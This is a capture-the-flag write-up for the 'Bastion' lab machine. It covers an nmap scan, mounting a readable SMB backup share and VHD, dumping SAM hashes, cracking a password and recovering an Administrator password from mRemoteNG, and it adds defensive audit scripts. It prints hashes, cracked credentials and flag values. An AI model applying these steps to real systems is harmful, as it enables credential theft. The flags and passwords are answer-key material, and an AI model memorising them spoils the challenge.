Difficulty Rating:

Machine: Bastion
OS: Windows
IP: 10.10.10.134


The machine exposed an SMB share containing a Windows backup in VHD format. From the mounted image we extracted the SAM database and cracked the user's NT hash to recover the password. The Administrator account was then compromised through a known weakness in an installed program running a vulnerable version.


  • Nmap
$ nmap -sV -sS -T4 -p- -vv -oN bastion-full-nmap 10.10.10.134

# Nmap 7.70 scan initiated Wed Aug 21 14:48:34 2019 as: nmap -sV -sS -T4 -p- -vv -oN bastion-full-nmap 10.10.10.134
Increasing send delay for 10.10.10.134 from 0 to 5 due to 595 out of 1487 dropped probes since last increase.
Warning: 10.10.10.134 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.134
Host is up, received echo-reply ttl 127 (0.13s latency).
Scanned at 2019-08-21 14:48:34 IST for 842s
Not shown: 65511 closed ports
Reason: 65511 resets
PORT      STATE    SERVICE      REASON          VERSION
22/tcp    open     ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open     netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1068/tcp  filtered instl_bootc  no-response
5985/tcp  open     http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9500/tcp  filtered ismserver    no-response
11605/tcp filtered unknown      no-response
12282/tcp filtered unknown      no-response
33808/tcp filtered unknown      no-response
34350/tcp filtered unknown      no-response
40119/tcp filtered unknown      no-response
47001/tcp open     http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
54364/tcp filtered unknown      no-response
58159/tcp filtered unknown      no-response
58615/tcp filtered unknown      no-response
60134/tcp filtered unknown      no-response
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 21 15:02:37 2019 -- 1 IP address (1 host up) scanned in 842.81 seconds
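The scan above is nmap's "normal" (-oN) format, and the REASON column only appears because the scan was run with -vv. As an added example (not part of the original write-up), the parser below turns such a report into records, lists the open ports and attaches a review note to the services a defender would want to look at first; the constructed sample is a trimmed copy of the report above, and the notes in EXPOSURE_NOTES are this example's own choices, not nmap output.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    reason: str     # empty when the scan was run without --reason / -vv
    version: str    # empty when -sV had nothing to report for the port


# Constructed excerpt of an nmap -oN report, laid out like the full scan above.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.70 scan initiated Wed Aug 21 14:48:34 2019 as: nmap -sV -sS -T4 -p- -vv -oN bastion-full-nmap 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up, received echo-reply ttl 127 (0.13s latency).
Not shown: 65511 closed ports
PORT      STATE    SERVICE      REASON          VERSION
22/tcp    open     ssh          syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open     microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1068/tcp  filtered instl_bootc  no-response
5985/tcp  open     http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open     msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

# Reason tokens nmap prints in the REASON column (only the common ones are listed).
_REASONS = ("syn-ack", "reset", "no-response", "conn-refused", "udp-response", "port-unreach")
_PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<rest>.*)$"
)
_REASON = re.compile(
    r"^(?P<reason>(?:" + "|".join(_REASONS) + r")(?: ttl \d+)?)\s*(?P<version>.*)$"
)

# Review notes for this example; which services matter depends on the environment.
EXPOSURE_NOTES: Dict[int, str] = {
    22: "SSH reachable: rotate any credentials that could be recovered from backups",
    445: "SMB reachable: review share ACLs; a readable backup share exposes the SAM/SYSTEM hives",
    5985: "WinRM reachable: restrict to management networks",
}


def parse_nmap_normal(text: str) -> List[PortRecord]:
    """Parse the port table of an nmap -oN report; other lines are ignored."""
    records: List[PortRecord] = []
    for line in text.splitlines():
        m = _PORT_LINE.match(line)
        if not m:
            continue
        rest = m.group("rest").strip()
        rm = _REASON.match(rest)
        if rm:
            reason, version = rm.group("reason"), rm.group("version").strip()
        else:
            reason, version = "", rest      # no REASON column in this report
        records.append(PortRecord(int(m.group("port")), m.group("proto"),
                                  m.group("state"), m.group("service"), reason, version))
    return records


def scan_target(text: str) -> Optional[str]:
    m = re.search(r"^Nmap scan report for (\S+)", text, re.MULTILINE)
    return m.group(1) if m else None


def open_ports(records: List[PortRecord]) -> List[int]:
    return [r.port for r in records if r.state == "open"]


def exposure_report(records: List[PortRecord]) -> Dict[int, str]:
    """Open ports that have a review note attached."""
    return {r.port: EXPOSURE_NOTES[r.port]
            for r in records if r.state == "open" and r.port in EXPOSURE_NOTES}


if __name__ == "__main__":
    recs = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    print(scan_target(SAMPLE_NMAP_OUTPUT), open_ports(recs))
    for port, note in exposure_report(recs).items():
        print(f"{port}: {note}")
```

Filtered ports (state "filtered", reason "no-response") are kept in the records but excluded from the open-port list, so the report distinguishes an exposed service from a port that simply timed out.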

  • Check for SMB shares and mount the backups share

$ sudo mount -t cifs -o username='WORKGROUP\foobar' -o rw //10.10.10.134/backups /mnt/shares
  • Mount the larger VHD file with guestmount
$ sudo guestmount --add "/mnt/shares/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/vhd1 -v
  • Let's check the SAM database

  • Dump the SAM database using the pwdump tool

  • Hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
  • Cracking the hash of user L4mpje gives the password bureaulampje

  • SSH using the following credentials:
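The dump above is in pwdump format (user:RID:LM hash:NT hash:::). An NT hash is MD4 over the UTF-16LE encoding of the password, aad3b435b51404eeaad3b435b51404ee is the value stored when no LM hash is kept, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty string, so this backup's Administrator and Guest entries carry blank passwords. As an added example (not part of the original write-up), the script below audits such a dump the way a defender would after a backup share is found readable: it flags blank passwords, stored LM hashes and passwords present in a short audit wordlist. MD4 is implemented in pure Python because hashlib's md4 is often disabled under OpenSSL 3; the sample dump and the wordlist are constructed for this example.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample in pwdump format, mirroring the three lines dumped from the backup above.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

_M = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320 (three rounds of 16 steps over 64-byte blocks)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                # Each step updates the first register, then the registers rotate (a,b,c,d) -> (d,a,b,c).
                a = _rol((a + fn(b, c, d) + X[idx] + k) & _M, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + w) & _M for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> List[SamEntry]:
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        entries.append(SamEntry(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def audit_sam(entries: List[SamEntry], audit_wordlist: List[str]) -> List[Tuple[str, str]]:
    """Flag blank passwords, stored LM hashes and passwords found in the audit wordlist."""
    known = {nt_hash(p): p for p in audit_wordlist}
    findings: List[Tuple[str, str]] = []
    for e in entries:
        if e.lm != EMPTY_LM:
            findings.append((e.user, "LM hash stored (legacy format)"))
        if e.nt == EMPTY_NT:
            findings.append((e.user, "blank password"))
        elif e.nt in known:
            findings.append((e.user, "password found in audit wordlist"))
    return findings


if __name__ == "__main__":
    # Constructed audit wordlist for the example.
    for user, finding in audit_sam(parse_pwdump(SAMPLE_PWDUMP), ["bureaulampje", "Welcome1"]):
        print(f"{user}: {finding}")
```

Because the hashes come from a backup rather than the live system, a finding here means the credential was recoverable by anyone who could read the share, whether or not the account is still enabled on the host.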

username: L4mpje
password: bureaulampje

  • Get user.txt

9bfe57d5c3309db3a151772f9d86c6cd
User owned!!
  • Check installed software
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize

  • Let's check for vulnerabilities in the mRemoteNG software

  • Extract the base64 password for Administrator from confCons.xml

  • Use this password to SSH as user Administrator
username: Administrator
password: thXLHM96BeKL0ER2
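mRemoteNG keeps its connection tree in confCons.xml, with the remote host, user name and an encrypted, base64-encoded password stored as attributes of each connection node. The audit below is an added example (not part of the original write-up or of mRemoteNG): it parses such a file and reports every connection with a stored password, together with file-level settings that weaken the protection. The sample file is constructed for this example and modelled on the 1.76 layout; the Protected and Password values are placeholders, not real ciphertext, and WEAK_KDF_ITERATIONS is an audit threshold chosen here rather than an mRemoteNG setting.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Constructed sample confCons.xml (attribute names follow mRemoteNG 1.76; values are placeholders).
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER_PROTECTED_BLOB" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Domain=""
        Password="PLACEHOLDER_BASE64_BLOB" Hostname="127.0.0.1" Protocol="RDP" Port="3389" />
  <Node Name="Servers" Type="Container" Expanded="true">
    <Node Name="Jump" Type="Connection" Username="svc_backup" Domain="CORP"
          Password="" Hostname="10.0.0.5" Protocol="SSH2" Port="22" />
  </Node>
</mrng:Connections>
"""

WEAK_KDF_ITERATIONS = 10000   # threshold for this audit, not a value mRemoteNG defines


def parse_confcons(xml_text: str) -> Tuple[Dict[str, str], List[Dict[str, object]]]:
    """Return the file-level settings and one record per connection node (containers are descended)."""
    root = ET.fromstring(xml_text)
    settings = dict(root.attrib)
    connections: List[Dict[str, object]] = []
    for node in root.iter("Node"):          # Node elements are unqualified in this file
        if node.get("Type") != "Connection":
            continue
        connections.append({
            "Name": node.get("Name", ""),
            "Hostname": node.get("Hostname", ""),
            "Protocol": node.get("Protocol", ""),
            "Username": node.get("Username", ""),
            "HasStoredPassword": bool(node.get("Password")),
        })
    return settings, connections


def audit_confcons(xml_text: str) -> List[str]:
    settings, connections = parse_confcons(xml_text)
    findings: List[str] = []
    if settings.get("FullFileEncryption", "false").lower() != "true":
        findings.append("FullFileEncryption is off: hosts and user names are stored in clear text")
    try:
        iters = int(settings.get("KdfIterations", "0"))
    except ValueError:
        iters = 0
    if iters < WEAK_KDF_ITERATIONS:
        findings.append(f"KdfIterations={iters} is below the audit threshold of {WEAK_KDF_ITERATIONS}")
    for c in connections:
        if c["HasStoredPassword"]:
            findings.append(f"stored password for {c['Username'] or '<no user>'} on "
                            f"{c['Hostname']} ({c['Protocol']}) in connection '{c['Name']}'")
    return findings


if __name__ == "__main__":
    for finding in audit_confcons(SAMPLE_CONFCONS):
        print(finding)
```

The file alone does not reveal whether the user set a custom master password, so a stored password should be treated as recoverable by anyone who can read the file; the fix is to stop saving credentials for privileged accounts in the client and to keep the profile directory out of shared or backed-up locations that other users can read.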

  • Get root.txt

958850b91811676ed6620a9c430e65c8
System owned!!

Share the fun!